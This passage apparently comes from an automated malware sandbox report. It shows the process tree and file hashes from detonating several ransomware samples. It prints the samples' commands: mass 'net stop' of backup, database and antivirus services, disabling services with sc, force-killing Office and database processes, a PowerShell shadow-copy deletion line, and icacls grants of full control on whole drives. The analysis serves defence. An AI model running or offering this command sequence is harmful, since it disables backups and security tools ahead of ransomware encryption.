-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y5⤵PID:15420
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y4⤵PID:5956
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y5⤵PID:15460
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MBAMService /y4⤵PID:5964
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MBAMService /y5⤵PID:16028
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploySvc /y4⤵PID:5972
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y5⤵PID:16328
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLSERVER /y4⤵PID:5980
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y5⤵PID:13972
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MBEndpointAgent /y4⤵PID:5988
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y5⤵PID:16404
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y4⤵PID:5996
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y5⤵PID:15148
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerADHelper /y4⤵PID:6004
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y5⤵PID:16360
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeEngineService /y4⤵PID:6012
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y5⤵PID:16432
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamHvIntegrationSvc /y4⤵PID:6020
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y5⤵PID:15556
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerADHelper100 /y4⤵PID:6028
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y5⤵PID:15548
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeFramework /y4⤵PID:6036
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y5⤵PID:15468
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamMountSvc /y4⤵PID:6044
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y5⤵PID:756
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerOLAPService /y4⤵PID:6052
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y5⤵PID:16808
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y4⤵PID:6060
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y5⤵PID:15476
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y4⤵PID:6068
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y5⤵PID:14504
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MySQL57 /y4⤵PID:6076
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL57 /y5⤵PID:16176
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McShield /y4⤵PID:6084
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McShield /y5⤵PID:16244
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamRESTSvc /y4⤵PID:6092
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y5⤵PID:15948
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MySQL80 /y4⤵PID:6100
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL80 /y5⤵PID:15684
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McTaskManager /y4⤵PID:6108
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McTaskManager /y5⤵PID:16252
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y4⤵PID:6116
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y5⤵PID:15888
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop OracleClientCache80 /y4⤵PID:6124
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y5⤵PID:16312
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfefire /y4⤵PID:6132
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfefire /y5⤵PID:15692
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop wbengine /y4⤵PID:6140
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y5⤵PID:16732
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SQL_2008 /y4⤵PID:6148
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y5⤵PID:16872
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfemms /y4⤵PID:6156
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfemms /y5⤵PID:16480
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop wbengine /y4⤵PID:6164
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y5⤵PID:16472
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RESvc /y4⤵PID:6172
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RESvc /y5⤵PID:16144
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfevtp /y4⤵PID:6180
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfevtp /y5⤵PID:16152
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sms_site_sql_backup /y4⤵PID:6188
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y5⤵PID:16724
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y4⤵PID:6196
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y5⤵PID:16648
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SOPHOS /y4⤵PID:6204
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y5⤵PID:15340
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y4⤵PID:6212
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y5⤵PID:15292
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sacsvr /y4⤵PID:6220
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sacsvr /y5⤵PID:14416
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$CXDB /y4⤵PID:6228
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y5⤵PID:15132
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SAVAdminService /y4⤵PID:6236
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y5⤵PID:15640
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$ECWDB2 /y4⤵PID:6244
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y5⤵PID:14456
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SAVService /y4⤵PID:6252
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAVService /y5⤵PID:14916
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y4⤵PID:6260
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y5⤵PID:16296
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SepMasterService /y4⤵PID:6268
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SepMasterService /y5⤵PID:14800
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y4⤵PID:6276
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y5⤵PID:13920
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ShMonitor /y4⤵PID:6284
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ShMonitor /y5⤵PID:10168
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PROD /y4⤵PID:6292
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y5⤵PID:14784
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Smcinst /y4⤵PID:6300
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Smcinst /y5⤵PID:15348
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y4⤵PID:6308
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y5⤵PID:16692
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SmcService /y4⤵PID:6316
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SmcService /y5⤵PID:15324
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y4⤵PID:6324
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y5⤵PID:15388
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SntpService /y4⤵PID:6332
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SntpService /y5⤵PID:15396
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y4⤵PID:6340
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y5⤵PID:15372
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophossps /y4⤵PID:6348
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophossps /y5⤵PID:14424
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SQL_2008 /y4⤵PID:6356
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y5⤵PID:6824
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SOPHOS /y4⤵PID:6364
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y5⤵PID:15492
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y4⤵PID:6372
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y5⤵PID:14740
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop svcGenericHost /y4⤵PID:6380
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y5⤵PID:15380
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y4⤵PID:6388
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y5⤵PID:14768
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_filter /y4⤵PID:6396
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_filter /y5⤵PID:15124
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$TPS /y4⤵PID:6404
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y5⤵PID:14900
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_service /y4⤵PID:6416
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_service /y5⤵PID:14924
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$TPSAMA /y4⤵PID:6424
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y5⤵PID:16488
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_update /y4⤵PID:6432
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_update /y5⤵PID:15804
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y4⤵PID:6440
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y5⤵PID:15012
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_update_64 /y4⤵PID:6452
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y5⤵PID:15796
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y4⤵PID:6460
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y5⤵PID:14956
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TmCCSF /y4⤵PID:6472
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TmCCSF /y5⤵PID:15428
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLBrowser /y4⤵PID:6484
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y5⤵PID:15412
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop tmlisten /y4⤵PID:6492
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop tmlisten /y5⤵PID:14760
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLSafeOLRService /y4⤵PID:6504
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y5⤵PID:16320
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKey /y4⤵PID:6512
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKey /y5⤵PID:15364
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLSERVERAGENT /y4⤵PID:6520
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y5⤵PID:15676
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKeyScheduler /y4⤵PID:6528
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y5⤵PID:15956
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLTELEMETRY /y4⤵PID:6536
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y5⤵PID:16412
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKeyServiceHelper /y4⤵PID:6552
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y5⤵PID:16368
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y4⤵PID:6560
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y5⤵PID:14792
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop WRSVC /y4⤵PID:6568
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WRSVC /y5⤵PID:15660
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mssql$vim_sqlexp /y4⤵PID:6576
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y5⤵PID:16016
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop vapiendpoint /y4⤵PID:6584
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y5⤵PID:15740
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SQL_2008 /y4⤵PID:6684
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y5⤵PID:16496
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y4⤵PID:6700
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y5⤵PID:16680
-
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled4⤵
- Launches sc.exe
PID:6804
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled4⤵
- Launches sc.exe
PID:6812
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled4⤵
- Launches sc.exe
PID:6820
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled4⤵
- Launches sc.exe
PID:6828
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F4⤵
- Kills process with taskkill
PID:6836
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F4⤵
- Kills process with taskkill
PID:6844
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F4⤵
- Kills process with taskkill
PID:6852
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /F4⤵
- Kills process with taskkill
PID:6860
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F4⤵
- Kills process with taskkill
PID:6868
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F4⤵
- Kills process with taskkill
PID:6876
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F4⤵
- Kills process with taskkill
PID:6884
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat.exe /F4⤵
- Kills process with taskkill
PID:6892
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM steam.exe /F4⤵
- Kills process with taskkill
PID:6900
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM encsvc.exe /F4⤵
- Kills process with taskkill
PID:6908
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM excel.exe /F4⤵
- Kills process with taskkill
PID:6916
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F4⤵
- Kills process with taskkill
PID:6924
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F4⤵
- Kills process with taskkill
PID:6936
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F4⤵
- Kills process with taskkill
PID:6944
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F4⤵
- Kills process with taskkill
PID:6956
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat64.exe /F4⤵
- Kills process with taskkill
PID:6964
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocomm.exe /F4⤵
- Kills process with taskkill
PID:6972
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM infopath.exe /F4⤵
- Kills process with taskkill
PID:6980
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F4⤵
- Kills process with taskkill
PID:6988
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM zoolz.exe /F4⤵
- Kills process with taskkill
PID:6996
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" IM thunderbird.exe /F4⤵
- Kills process with taskkill
PID:7004
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F4⤵
- Kills process with taskkill
PID:7012
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F4⤵
- Kills process with taskkill
PID:7020
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F4⤵
- Kills process with taskkill
PID:7028
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F4⤵
- Kills process with taskkill
PID:7036
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F4⤵
- Kills process with taskkill
PID:7048
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM onenote.exe /F4⤵
- Kills process with taskkill
PID:7056
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F4⤵
- Kills process with taskkill
PID:7068
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msaccess.exe /F4⤵
- Kills process with taskkill
PID:7076
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM outlook.exe /F4⤵
- Kills process with taskkill
PID:7084
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F4⤵
- Kills process with taskkill
PID:7092
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msftesql.exe /F4⤵
- Kills process with taskkill
PID:7100
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F4⤵
- Kills process with taskkill
PID:7108
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F4⤵
- Kills process with taskkill
PID:7116
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM visio.exe /F4⤵
- Kills process with taskkill
PID:7124
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F4⤵
- Kills process with taskkill
PID:7132
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM winword.exe /F4⤵
- Kills process with taskkill
PID:7144
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F4⤵
- Kills process with taskkill
PID:7152
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM wordpad.exe /F4⤵
- Kills process with taskkill
PID:7164
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F4⤵
- Kills process with taskkill
PID:5160
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F4⤵
- Kills process with taskkill
PID:544
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocssd.exe /F4⤵
- Kills process with taskkill
PID:1496
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM oracle.exe /F4⤵
- Kills process with taskkill
PID:7176
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F4⤵
- Kills process with taskkill
PID:7184
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F4⤵
- Kills process with taskkill
PID:7192
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F4⤵
- Kills process with taskkill
PID:7200
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM synctime.exe /F4⤵
- Kills process with taskkill
PID:7208
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }4⤵PID:7216
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q4⤵
- Modifies file permissions
PID:7252
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q4⤵
- Modifies file permissions
PID:7260
-
-
C:\Windows\SysWOW64\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q4⤵
- Modifies file permissions
PID:7268
-
-
-
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.Win32.Agent.gen-7985a06e0d0741623d33531ed7f20a60eb47efba0d04ea1232d132ae6fc902cf.exeHEUR-Trojan-Ransom.Win32.Agent.gen-7985a06e0d0741623d33531ed7f20a60eb47efba0d04ea1232d132ae6fc902cf.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3952 -
C:\Users\Admin\AppData\Local\Temp\NOD65.exe"C:\Users\Admin\AppData\Local\Temp\NOD65.exe"4⤵PID:13476
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\ключи.txt4⤵PID:19320
-
-
-
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.Win32.Avaddon.gen-e53b7f74cba1228b9f406c04e0ec580f4597d6de93cb5cdbf51564fee4111ead.exeHEUR-Trojan-Ransom.Win32.Avaddon.gen-e53b7f74cba1228b9f406c04e0ec580f4597d6de93cb5cdbf51564fee4111ead.exe3⤵PID:16856
-
-
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.Win32.Blocker.gen-218e1a2d72b5baa1681b8d67abcbc8f8ab0681c6ff6d6d03283328458aadeb59.exeHEUR-Trojan-Ransom.Win32.Blocker.gen-218e1a2d72b5baa1681b8d67abcbc8f8ab0681c6ff6d6d03283328458aadeb59.exe3⤵PID:19416
-
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3fb8055 /state1:0x41c64e6d1⤵PID:18604
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9.3MB
MD58930f5a56afe4a9f02c01c6c6b647da0
SHA1b1000f35e9150d59b0849a662d35f69e67294a51
SHA25609aaf5e962480a6412c5523f6705489e5aee2f2bd3e42491074b903d0f5d3d3d
SHA51205ed5347ffd7bfd1692d7f61f1a051d9377710abdd366ef05ca399566d01cb3bb4065a0693f85ca1e5455452ce3cda2a795f73f259ba3158492f2fb62165b1dc
-
Filesize
64KB
MD5d2fb266b97caff2086bf0fa74eddb6b2
SHA12f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
Filesize
944B
MD56bd369f7c74a28194c991ed1404da30f
SHA10f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA5128fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
-
Filesize
1.4MB
MD500a0c71dbc43efc7e53eea7243c35538
SHA157144dff50f3320eee576810f8770f7dce7ec124
SHA256ce59eb41a1f5aee393065fecae450e878a4bb83b5662edebfd524a852f0ac515
SHA512dadfac7fe9ec775ae9773c5e3f5b90af3070709f23b1458e549e21f058688dca4e4d1c3714c9f248031a3aedaff3b50a4d1c592a793640878890b901ce019f34
-
Filesize
462B
MD540efb51797eba37ca8fc4134750ba797
SHA1669c3ef5dd9eaf0e5343d4a4a2899bd9c1e3f4de
SHA25688ae09c6a9342b3ac736c3c371201c48f1847988343544f4fcf8bc878eb0f18c
SHA512d3315b123faadbaa0df3d947a1f2159a723dc4fc78500a824a57455fa01e184b25863788ac6fe8a25987b443f184e202f81dfe2f017d64629e10e350674fd0cf
-
Filesize
3.4MB
MD55b1bfbdb1c35544328b3246a64043822
SHA1e6e16ece2b3dc7ce45acab9b7968130755df929a
SHA2568bafbed0b032896bb033f37d40d5a5263a542e65be6f0d2ac64ed7736c48dba8
SHA51284c68bb64a2aa36cc51eb643737d6f72233c7de276bc7a344b73d9b5f93aa5e552a276f80d3d7a551d65ea3711881f7709e14b663f4e27f521ec385408afcc28
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
